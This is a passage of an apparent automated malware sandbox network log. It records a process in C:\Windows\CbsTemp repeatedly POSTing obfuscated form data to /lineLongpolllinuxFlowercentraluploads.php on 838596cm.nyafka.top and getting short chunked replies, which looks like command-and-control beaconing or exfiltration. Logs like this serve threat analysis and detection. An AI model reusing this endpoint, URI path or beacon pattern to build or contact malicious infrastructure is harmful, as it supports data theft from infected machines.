                                                                                                          Jan 8, 2025 17:13:06.198607922 CET803INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:06 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adM1O7FZmY63RuxIr9aRh3brSEOSuiT0RIEgFxT3DMVS%2BlzPyT2dNyoQ9TYgNHdZEsFS5KdwuhnTj6h2vVHn%2B7UzKmCQpiULDsjE2YHmxzA5L8kKTUUA6fieVyOYmTTFT3lTVRB5"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed790fe81f729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3155&min_rtt=1951&rtt_var=3140&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=126014&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          9192.168.2.549912104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:06.658106089 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:07.004473925 CET2532OUTData Raw: 55 54 5e 50 5c 5d 53 5f 5e 5f 57 54 56 58 59 52 57 5e 58 5a 50 58 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UT^P\]S_^_WTVXYRW^XZPXVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ (;#\'3-=.*8'+Z=1^*X$82S(\(< Y"=8,/#_&'P-?
                                                                                                          Jan 8, 2025 17:13:07.113850117 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:07.354341984 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:07 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0BZXNCr1cUbzvulbIQAtCBoojiys9NHHMZiFDitcTIzs%2F8WI56BuciwhZFnmOEbUhyY9cjZj6SLo1h6eKOwm68t43XRWDq2RMWOb1OVK6bYdngfzOoIWUZaCLP%2FAT64qTm86i2ko"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79172bdfc34f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3172&min_rtt=1441&rtt_var=4003&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=95462&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          10192.168.2.549917104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:07.515603065 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:07.881236076 CET2532OUTData Raw: 50 52 5b 55 5c 5c 56 5b 5e 5f 57 54 56 5d 59 59 57 51 58 58 50 5e 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PR[U\\V[^_WTV]YYWQXXP^V_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ + 0"=9,4<=X%)5Y$89<;_=?35=8-#_&'P-+
                                                                                                          Jan 8, 2025 17:13:07.958478928 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:08.218983889 CET806INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:08 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDTTcjJUHGumudf1%2BlLUiKUyLUKqFfpKcMPxdwMX3VU82PqJHLSGrzKHYoF87QTiVLPXvSQ%2FGbd%2BX55J6dbMdswiGphswsh%2B%2B1D5jK0nVi1b2YBllj%2Bl3CR8wRMnm0ETLTUAeGuF"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed791c7f99424b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3130&min_rtt=1573&rtt_var=3705&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=104040&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a
                                                                                                          Data Ascii: 41U][
                                                                                                          Jan 8, 2025 17:13:08.305960894 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          11192.168.2.549923104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:08.479665995 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:08.832499027 CET2532OUTData Raw: 55 51 5b 52 5c 5c 56 52 5e 5f 57 54 56 5d 59 53 57 54 58 52 50 5f 56 5a 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UQ[R\\VR^_WTV]YSWTXRP_VZ[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ (<0#_*-2/'?>%_);:&;%<#\>Y<\"$.#_&'P-+
                                                                                                          Jan 8, 2025 17:13:08.982019901 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:09.255065918 CET810INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LO9Zm7K4mhteba6VYJnVF8TE0V5EQpkBoKWi4NmnaoPocjJElk4Qoc%2FuLnkFuxWqa6ePc%2FIO3JyPJWRajYToMC%2Fe27%2FXioQ3KJbbueg15zVD1k%2FrenKeUmytd1Ea56gt%2FIYauDE1"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7922d99c729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4523&min_rtt=1970&rtt_var=5846&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=65175&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          12192.168.2.549929104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:09.276532888 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 1828
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:09.629440069 CET1828OUTData Raw: 55 53 5e 54 59 58 56 5a 5e 5f 57 54 56 5d 59 5a 57 55 58 5b 50 5b 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: US^TYXVZ^_WTV]YZWUX[P[V[[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#+8$0">,$]=X=^*;1Z']9(0>?36+X.#_&'P-+
                                                                                                          Jan 8, 2025 17:13:09.761085033 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:10.002829075 CET955INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:09 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1%2BW8B8H%2F75O6mSn0Y6mjeGfVeX4jJDx3sDFy9YyXJLM%2FVl0kYaCUNf6T17XV3qOzlDQbcFOsZ%2BYWDFTN99IFabQ7MbdK0Mw0RsehMdeNpEvmFqckr8wYRVI24IHli8zeQG1EXacS"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7927a91e0f5b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3784&min_rtt=1718&rtt_var=4777&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2177&delivery_rate=79995&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 39 38 0d 0a 03 1d 24 53 24 5b 2c 5f 34 3b 08 08 3f 3a 33 5e 29 55 2d 03 39 29 06 5c 31 1d 3f 04 26 3c 0d 05 23 01 2a 07 2b 5e 22 04 26 36 24 56 2b 2b 20 5c 04 1f 24 15 3e 28 00 0c 2a 3f 0b 05 30 0a 39 5c 25 30 34 5c 25 2d 3b 5b 27 29 0c 55 23 00 33 50 2c 0a 26 1a 2d 2b 33 01 2b 37 3c 5c 30 3e 2f 50 0f 10 3b 0d 2e 5f 2f 1e 36 1f 2a 57 20 30 28 05 23 35 0a 5f 3d 5b 3f 1b 35 11 22 03 24 33 39 1a 23 1c 09 55 33 1d 2b 16 2b 0f 2c 10 2b 33 24 55 2c 02 2c 49 02 3f 58 52 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 98$S$[,_4;?:3^)U-9)\1?&<#*+^"&6$V++ \$>(*?09\%04\%-;[')U#3P,&-+3+7<\0>/P;._/6*W 0(#5_=[?5"$39#U3++,+3$U,,I?XR0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          13192.168.2.549931104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:09.454803944 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:09.801594973 CET2532OUTData Raw: 55 55 5e 52 5c 5f 56 5e 5e 5f 57 54 56 56 59 52 57 5f 58 5d 50 59 56 5f 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^R\_V^^_WTVVYRW_X]PYV_[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ ?(3[=!/4=X9(8:$].R)"'*,8\"-$-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:09.900078058 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:10.139945030 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:10 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kfeqNGIAwSsM7yVAcbLMcHxEYizj8AYC9EYtEfFepFIzJMadwYGCBI4mkAiQQXT12o2vZRUItH0hSu0ukwpwgLkSGuCfJJPjEeiRiE8rP7f%2FSG5EOORrtmS%2FP7Jep37zJ1fKNfbx"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7928984e729f-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=5031&min_rtt=2014&rtt_var=6789&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=55829&cwnd=168&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          14192.168.2.549938104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:10.306262970 CET325OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Jan 8, 2025 17:13:10.663181067 CET2532OUTData Raw: 50 56 5b 55 59 59 56 5b 5e 5f 57 54 56 5c 59 5f 57 51 58 5b 50 54 56 59 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: PV[UYYV[^_WTV\Y_WQX[PTVY[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\#<8<$U._>==Z.'<>>>;'(1)2/*/$\5]-#_&'P-/
                                                                                                          Jan 8, 2025 17:13:10.775485992 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:11.011657953 CET802INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:10 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MrDvD6Rf7kD6iPh%2FWSTDsrFPca6QBdYHZsIXmXGnXbluAlg2YqvvIYC1xHzMJOm7vLzu2SJNKNv5a0MDZdBLTpLTbvTTrYvIyCBuBDWPUzi1%2FZTDYdE2lYzha7bz4FakQI43jbWh"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed792e0c2843b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3309&min_rtt=1613&rtt_var=3997&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2857&delivery_rate=96166&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          15192.168.2.549944104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:11.195007086 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2528
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:11.551234007 CET2528OUTData Raw: 55 52 5b 54 59 5a 56 5b 5e 5f 57 54 56 5e 59 5d 57 50 58 5b 50 5a 56 58 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UR[TYZV[^_WTV^Y]WPX[PZVX[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ X?;+0#.)=;<)X&=$]&V("+X*/ 6(-?#_&'P-
                                                                                                          Jan 8, 2025 17:13:11.639712095 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:11.886771917 CET807INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:11 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fEhjqm7CNtHWAfANhbzqqq%2FAX90xEMuWCKa%2BxmVIyhlCtt7oG9ChpcMe1MQ43D1spQ1Hk%2B4tfvtBPIEWaJhclQQwnKLy7Fe7XS9dzOHM4Q4kTbrj4ef2avTOvbO7t9leUv%2FBBpsS"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed79337d48727b-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2458&min_rtt=2008&rtt_var=1653&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2877&delivery_rate=260249&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          16192.168.2.549950104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:12.014084101 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:12.363692045 CET2532OUTData Raw: 55 55 5e 55 59 58 56 5a 5e 5f 57 54 56 57 59 52 57 56 58 59 50 5d 56 5e 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
                                                                                                          Data Ascii: UU^UYXVZ^_WTVWYRWVXYP]V^[EZ[[]V^[Z^ZVYR\ZWWSV\Z[WW^ZBYWRW^U^ZR^[]V^_^XQXZX]V]XY\RRXWSYZYSVV]ZZUTY]BVU\Y\YPXQYSAX[@__C[\W_][WY_CS]TYW\QP_BWV_SD[WSXPARS[W^E\VZ\TXF\YZ^]W^YDRZ[_S^[UXU]\U\ +#^'==>";4*>5\((=]'+W+!/_>?75-8:#_&'P-
                                                                                                          Jan 8, 2025 17:13:12.472752094 CET25INHTTP/1.1 100 Continue
                                                                                                          Jan 8, 2025 17:13:12.706957102 CET808INHTTP/1.1 200 OK
                                                                                                          Date: Wed, 08 Jan 2025 16:13:12 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: keep-alive
                                                                                                          cf-cache-status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM0oDHGQJ1aDTYOopW0WJTujYo8mKDDaXitJIERJ8A4%2FW2hTVHmO1CPk67Se5TlFl%2Fj%2Byps1FaWx2cRa5cOpNDlMilv8mQsm4C8JvPMvP22%2Fy1ohbX77z0V52DvJo1yj4FtXwO4%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fed7938ac7243b3-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3729&min_rtt=1585&rtt_var=4883&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2881&delivery_rate=77899&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                          Data Raw: 34 0d 0a 31 55 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 41U][0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          17192.168.2.549956104.21.112.1808200C:\Windows\CbsTemp\KocFkUIHAfhPoyuBQDEUMiWWSPCixy.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          Jan 8, 2025 17:13:12.934175014 CET349OUTPOST /lineLongpolllinuxFlowercentraluploads.php HTTP/1.1
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                          Host: 838596cm.nyafka.top
                                                                                                          Content-Length: 2532
                                                                                                          Expect: 100-continue
                                                                                                          Connection: Keep-Alive
                                                                                                          Jan 8, 2025 17:13:13.287704945 CET2532OUTData Raw: 50 51 5b 57 59 5d 53 59 5e 5f 57 54 56 59 59 5c 57 52 58 53 50 54 56 5b 5b 45 5a 5b 5b 5d 56 5e 5b 5a 5e 5a 56 59 52 5c 5a 57 57 53 56 5c 5a 5b 57 57 5e 5a 42 59 57 52 57 5e 55 5e 5a 52 5e 5b 5d 56 5e 5f 5e 58 51 58 5a 58 5d 56 5d 58 59 5c 52 52
